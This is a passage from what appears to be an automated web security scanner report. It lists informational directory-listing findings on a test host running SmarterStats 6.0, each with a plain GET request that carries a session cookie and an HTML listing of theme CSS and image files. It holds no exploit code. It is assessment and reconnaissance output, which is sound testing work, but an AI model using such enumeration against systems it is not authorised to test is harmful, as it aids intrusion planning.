Thursday, October 07, 2010 01:00 PM 9,693 <A href="HyperMenu.css">HyperMenu.css</A>
Thursday, October 07, 2010 01:00 PM 634 <A href="HyperPager.css">HyperPager.css</A>
Thursday, October 07, 2010 01:00 PM 1,032 <A href="HyperSplitter.css">HyperSplitter.css</A>
Thursday, October 07, 2010 01:00 PM 3,525 <A href="HyperTabstrip.css">HyperTabstrip.css</A>
Thursday, October 07, 2010 01:00 PM 2,059 <A href="HyperTreeView.css">HyperTreeView.css</A>
Thursday, October 07, 2010 01:00 PM 2,100 <A href="HyperWindow.css">HyperWindow.css</A>
Thursday, October 07, 2010 01:00 PM 1,391 <A href="Invitations.css">Invitations.css</A>
Thursday, October 07, 2010 01:00 PM 1,025 <A href="LitePanel.css">LitePanel.css</A>
Thursday, October 07, 2010 01:00 PM 1,169 <A href="LoadingGlyph.css">LoadingGlyph.css</A>
Thursday, October 07, 2010 01:00 PM 945 <A href="MainLayout.css">MainLayout.css</A>
Thursday, October 07, 2010 01:00 PM 1,618 <A href="ModalDialogs.css">ModalDialogs.css</A>
Thursday, October 07, 2010 01:00 PM 730 <A href="PageTitle.css">PageTitle.css</A>
Thursday, October 07, 2010 01:00 PM 2,207 <A href="Preview.css">Preview.css</A>
Thursday, October 07, 2010 01:00 PM 370 <A href="Reminders.css">Reminders.css</A>
Thursday, October 07, 2010 01:00 PM 47 <A href="Root.css">Root.css</A>
Thursday, October 07, 2010 01:00 PM 173 <A href="Sharebar.css">Sharebar.css</A>
Thursday, October 07, 2010 01:00 PM 3,487 <A href="Sidebar.css">Sidebar.css</A>
Thursday, October 07, 2010 01:00 PM 580 <A href="TiledView.css">TiledView.css</A>
Thursday, October 07, 2010 01:00 PM 463 <A href="TipText.css">TipText.css</A>
Thursday, October 07, 2010 01:00 PM 2,799 <A href="ValidatedSettings.css">ValidatedSettings.css</A>
Thursday, October 07, 2010 01:00 PM 1,264 <A href="Validation.css">Validation.css</A>
Thursday, October 07, 2010 01:00 PM 426 <A href="WarningMessage.css">WarningMessage.css</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.16. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/Popup/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/CSS/Popup/

Request

GET /App_Themes/Default/CSS/Popup/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:12:25 GMT
Content-Length: 1472
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/CSS/Popup/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/CSS/Popup/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/CSS/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 230 <A href="Buttons.css">Buttons.css</A>
Thursday, October 07, 2010 01:00 PM 549 <A href="Popup.css">Popup.css</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.17. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/Portal/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/CSS/Portal/

Request

GET /App_Themes/Default/CSS/Portal/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:12:18 GMT
Content-Length: 2520
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/CSS/Portal/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/CSS/Portal/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/CSS/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 959 <A href="Cust_ButtonBar.css">Cust_ButtonBar.css</A>
Thursday, October 07, 2010 01:00 PM 5,263 <A href="Cust_Chat.css">Cust_Chat.css</A>
Thursday, October 07, 2010 01:00 PM 994 <A href="Cust_ColorKey.txt">Cust_ColorKey.txt</A>
Thursday, October 07, 2010 01:00 PM 6,143 <A href="Cust_Grid.css">Cust_Grid.css</A>
Thursday, October 07, 2010 01:00 PM 1,895 <A href="Cust_KnowledgeBase.css">Cust_KnowledgeBase.css</A>
Thursday, October 07, 2010 01:00 PM 696 <A href="Cust_News.css">Cust_News.css</A>
Thursday, October 07, 2010 01:00 PM 3,599 <A href="Cust_Print.css">Cust_Print.css</A>
Thursday, October 07, 2010 01:00 PM 3,177 <A href="Cust_SearchResults.css">Cust_SearchResults.css</A>
Thursday, October 07, 2010 01:00 PM 15,729 <A href="Cust_Skin.css">Cust_Skin.css</A>
Thursday, October 07, 2010 01:00 PM 527 <A href="Cust_SocialNetwork.css">Cust_SocialNetwork.css</A>
Thursday, October 07, 2010 01:00 PM 8,741 <A href="Cust_TicketViewer.css">Cust_TicketViewer.css</A>
Thursday, October 07, 2010 01:00 PM 1,070 <A href="Survey.css">Survey.css</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.18. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/Print/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/CSS/Print/

Request

GET /App_Themes/Default/CSS/Print/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:12:25 GMT
Content-Length: 1381
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/CSS/Print/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/CSS/Print/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/CSS/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 716 <A href="Print.css">Print.css</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.19. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/Reporting/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/CSS/Reporting/

Request

GET /App_Themes/Default/CSS/Reporting/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:12:28 GMT
Content-Length: 1488
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/CSS/Reporting/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/CSS/Reporting/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/CSS/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 194 <A href="Dashboard.css">Dashboard.css</A>
Thursday, October 07, 2010 01:00 PM 6,581 <A href="Reports.css">Reports.css</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.20. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/Stats/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/CSS/Stats/

Request

GET /App_Themes/Default/CSS/Stats/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:12:30 GMT
Content-Length: 1678
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/CSS/Stats/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/CSS/Stats/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/CSS/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 50 <A href="Overrides.css">Overrides.css</A>
Thursday, October 07, 2010 01:00 PM 677 <A href="Overview.css">Overview.css</A>
Thursday, October 07, 2010 01:00 PM 412 <A href="ReportProgress.css">ReportProgress.css</A>
Thursday, October 07, 2010 01:00 PM 1,220 <A href="Sidebar.css">Sidebar.css</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.21. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/Track/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/CSS/Track/

Request

GET /App_Themes/Default/CSS/Track/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:12:31 GMT
Content-Length: 1925
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/CSS/Track/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/CSS/Track/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/CSS/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 959 <A href="Buttons.css">Buttons.css</A>
Thursday, October 07, 2010 01:00 PM 5,668 <A href="Chats.css">Chats.css</A>
Thursday, October 07, 2010 01:00 PM 1,485 <A href="Compose.css">Compose.css</A>
Thursday, October 07, 2010 01:00 PM 1,246 <A href="Controls.css">Controls.css</A>
Thursday, October 07, 2010 01:00 PM 73 <A href="Editor.css">Editor.css</A>
Thursday, October 07, 2010 01:00 PM 1,410 <A href="Sidebar.css">Sidebar.css</A>
Thursday, October 07, 2010 01:00 PM 5,548 <A href="Viewer.css">Viewer.css</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.22. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/Wizard/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/CSS/Wizard/

Request

GET /App_Themes/Default/CSS/Wizard/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:12:32 GMT
Content-Length: 1476
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/CSS/Wizard/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/CSS/Wizard/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/CSS/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 68 <A href="Buttons.css">Buttons.css</A>
Thursday, October 07, 2010 01:00 PM 1,234 <A href="Wizard.css">Wizard.css</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.23. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/Controls/

Request

GET /App_Themes/Default/Controls/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:13:00 GMT
Content-Length: 2174
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Controls/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/Controls/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/">[To Parent Directory]</A>

Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Calendar/">Calendar</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Combobox/">Combobox</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Common/">Common</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Editor/">Editor</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Grid/">Grid</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Input/">Input</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Spell/">Spell</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="TabStrip/">TabStrip</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Toolbar/">Toolbar</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Window/">Window</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.24. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Calendar/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/Controls/Calendar/

Request

GET /App_Themes/Default/Controls/Calendar/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:13:02 GMT
Content-Length: 1490
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Controls/Calendar/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/Controls/Calendar/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/Controls/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 6,296 <A href="Calendar.css">Calendar.css</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Img/">Img</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.25. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Calendar/Img/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/Controls/Calendar/Img/

Request

GET /App_Themes/Default/Controls/Calendar/Img/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Calendar/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:13:03 GMT
Content-Length: 2758
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Controls/Calendar/Img/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/Controls/Calendar/Img/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/Controls/Calendar/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 981 <A href="arrowLeft.gif">arrowLeft.gif</A>
Thursday, October 07, 2010 01:00 PM 972 <A href="arrowLeftHover.gif">arrowLeftHover.gif</A>
Thursday, October 07, 2010 01:00 PM 982 <A href="arrowRight.gif">arrowRight.gif</A>
Thursday, October 07, 2010 01:00 PM 973 <A href="arrowRightHover.gif">arrowRightHover.gif</A>
Thursday, October 07, 2010 01:00 PM 814 <A href="calendarBg.gif">calendarBg.gif</A>
Thursday, October 07, 2010 01:00 PM 404 <A href="datePickerPopup.gif">datePickerPopup.gif</A>
Thursday, October 07, 2010 01:00 PM 625 <A href="datePickerPopupHover.gif">datePickerPopupHover.gif</A>
Thursday, October 07, 2010 01:00 PM 269 <A href="DaysOfWeek.gif">DaysOfWeek.gif</A>
Thursday, October 07, 2010 01:00 PM 995 <A href="fastNavLeft.gif">fastNavLeft.gif</A>
Thursday, October 07, 2010 01:00 PM 986 <A href="fastNavLeftHover.gif">fastNavLeftHover.gif</A>
Thursday, October 07, 2010 01:00 PM 993 <A href="fastnavright.gif">fastnavright.gif</A>
Thursday, October 07, 2010 01:00 PM 986 <A href="fastNavRightHover.gif">fastNavRightHover.gif</A>
Thursday, October 07, 2010 01:00 PM 100 <A href="hoverBg.gif">hoverBg.gif</A>
Thursday, October 07, 2010 01:00 PM 155 <A href="selectBg.gif">selectBg.gif</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.26. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Combobox/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/Controls/Combobox/

Request

GET /App_Themes/Default/Controls/Combobox/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:13:05 GMT
Content-Length: 1402
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Controls/Combobox/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/Controls/Combobox/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/Controls/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 5,050 <A href="Combo.css">Combo.css</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.27. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Common/

Summary

Severity:   Information
Confidence:   Firm
